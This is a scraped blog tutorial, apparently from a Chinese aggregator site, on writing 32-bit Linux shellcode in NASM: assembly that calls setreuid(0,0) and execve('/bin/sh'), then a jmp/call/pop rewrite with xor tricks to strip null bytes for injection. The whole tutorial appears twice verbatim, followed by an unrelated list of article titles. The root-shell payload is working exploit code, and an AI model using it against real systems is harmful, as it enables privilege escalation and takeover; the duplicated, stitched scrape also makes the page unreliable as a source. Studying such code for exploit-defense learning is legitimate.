write shell code myself
来源:互联网 发布:伊戈达拉数据 编辑:程序博客网 时间:2024/05/17 00:18
write shell code is a intresting thing, so that let me do it myself!
the first vision of it, not a real shell code, but just like it !
section .data
filepath db "/bin/shXAAAABBBB" ; the string
section .text
global _start
_start
;; setruid(uid_t ruid,uid_t euid)
mov eax,70 ; setruid is syscall #70
mov ebx,0 ; set real uid to root
mov ecx,0 ; set effective uid to root
int 0x80
;; execve(const char *filename,char *const argv[],char *const envp[])
mov eax,0
mov ebx,filepath
mov [ebx+7],al
mov [ebx+8],ebx
mov [ebx+12],eax
mov eax,11
lea ecx,[ebx+8]
lea edx,[ebx+12]
int 0x80
the second vision is , you see we take the data segment into code segment
;; setruid(uid_t ruid,uid_t euid)
mov al,70 ; setruid is syscall #70
; mov ebx,0 ; set real uid to root
xor ebx,ebx
; mov ecx,0 ; set effective uid to root
xor ecx,ecx ; to move 0 from execute code
int 0x80
jmp short two
one:
pop ebx ; pop the "return address" from the stack
;; to put the address of the string into ebx
;; execve(const char *filename,char *const argv[],char *const envp[])
;; mov eax,0
xor eax,eax
mov [ebx+7],al
mov [ebx+8],ebx
mov [ebx+12],eax
mov al,11
lea ecx,[ebx+8]
lea edx,[ebx+12]
int 0x80
two:
call one
db "/bin/shXAAAABBBB"
be careful, the code "xor eax,eax" is the same function to "mov eax,0", but why we use it?
because "mov eax,0" will compile to "b8 00 00 00 00" it will end the shell code, (in c the 0 is the end of the string).
and we change "mov eax,70" to "mov al,70" is the same reason.
try to see the execute code youself. if you do not know how to see, or you do not have a hex edit , you can try the hexedit write by me, i have gave the source code before. it is write in c , copy it , and compiler it in gcc like this "gcc -o hexedit hexedit.c", and then you can use it to see the shell code, for me it is like this "./hexedit shellcode".
now we have done a half, to write a good shell code, let's go father!
the first vision of it, not a real shell code, but just like it !
section .data
filepath db "/bin/shXAAAABBBB" ; the string
section .text
global _start
_start
;; setruid(uid_t ruid,uid_t euid)
mov eax,70 ; setruid is syscall #70
mov ebx,0 ; set real uid to root
mov ecx,0 ; set effective uid to root
int 0x80
;; execve(const char *filename,char *const argv[],char *const envp[])
mov eax,0
mov ebx,filepath
mov [ebx+7],al
mov [ebx+8],ebx
mov [ebx+12],eax
mov eax,11
lea ecx,[ebx+8]
lea edx,[ebx+12]
int 0x80
the second vision is , you see we take the data segment into code segment
;; setruid(uid_t ruid,uid_t euid)
mov al,70 ; setruid is syscall #70
; mov ebx,0 ; set real uid to root
xor ebx,ebx
; mov ecx,0 ; set effective uid to root
xor ecx,ecx ; to move 0 from execute code
int 0x80
jmp short two
one:
pop ebx ; pop the "return address" from the stack
;; to put the address of the string into ebx
;; execve(const char *filename,char *const argv[],char *const envp[])
;; mov eax,0
xor eax,eax
mov [ebx+7],al
mov [ebx+8],ebx
mov [ebx+12],eax
mov al,11
lea ecx,[ebx+8]
lea edx,[ebx+12]
int 0x80
two:
call one
db "/bin/shXAAAABBBB"
be careful, the code "xor eax,eax" is the same function to "mov eax,0", but why we use it?
because "mov eax,0" will compile to "b8 00 00 00 00" it will end the shell code, (in c the 0 is the end of the string).
and we change "mov eax,70" to "mov al,70" is the same reason.
try to see the execute code youself. if you do not know how to see, or you do not have a hex edit , you can try the hexedit write by me, i have gave the source code before. it is write in c , copy it , and compiler it in gcc like this "gcc -o hexedit hexedit.c", and then you can use it to see the shell code, for me it is like this "./hexedit shellcode".
now we have done a half, to write a good shell code, let's go father!
- write shell code myself
- For myself / shell
- shell scritp---mail to myself
- Some test code designed by myself
- Myself
- Myself
- myself
- MySelf
- myself
- mySelf
- myself
- write solid code 心得
- 《Write Clean Code》
- Write Clean Code
- Write less code
- Write Code Every Day
- Just write the code
- Write 64 bit compatible code
- 新的一年开始了
- Java与C/C++的连动
- Visual C++窗体设计技巧集
- 闹元宵
- 美国历史学习
- write shell code myself
- SQL教程随看随记(三)
- [翻译] Effective C++, 3rd Edition, Item 48: 感受 template metaprogramming(模板元编程)
- 从SQL Server中读取XML文件
- 《和空姐同居的日子》
- 从Oracle迁移到SQL Server的陷阱
- 优化SQL Server索引的小技巧
- 在SQL SERVER中创建用来按小时报告的查询
- Win32 临界区实现原理浅析